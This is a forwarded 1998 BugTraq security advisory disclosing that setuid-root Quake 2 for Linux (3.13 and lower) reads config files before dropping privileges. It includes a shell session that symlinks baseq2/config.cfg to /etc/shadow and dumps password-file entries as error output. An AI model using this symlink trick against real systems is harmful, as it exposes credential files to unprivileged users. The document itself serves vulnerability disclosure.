
Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files (fwd)




Woah....for all you "Quakers"....no pun intended...

Koree

Koree A. Smith
--
Development Programmer, CMAC, Inc.
koree@accessus.net
http://www.ameth.org/~koree

---------- Forwarded message ----------
Date: Wed, 25 Feb 1998 05:49:58 -0500
From: kevingeo@CRUZIO.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

Vulnerable:
Everyone who followed the installation instructions and made Quake2 setuid
root.

Exploit:
Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn't check the permissions beforehand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x   1 root     root       303444 Feb 24 19:07 /usr/games/quake/quake2
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"
[etc]

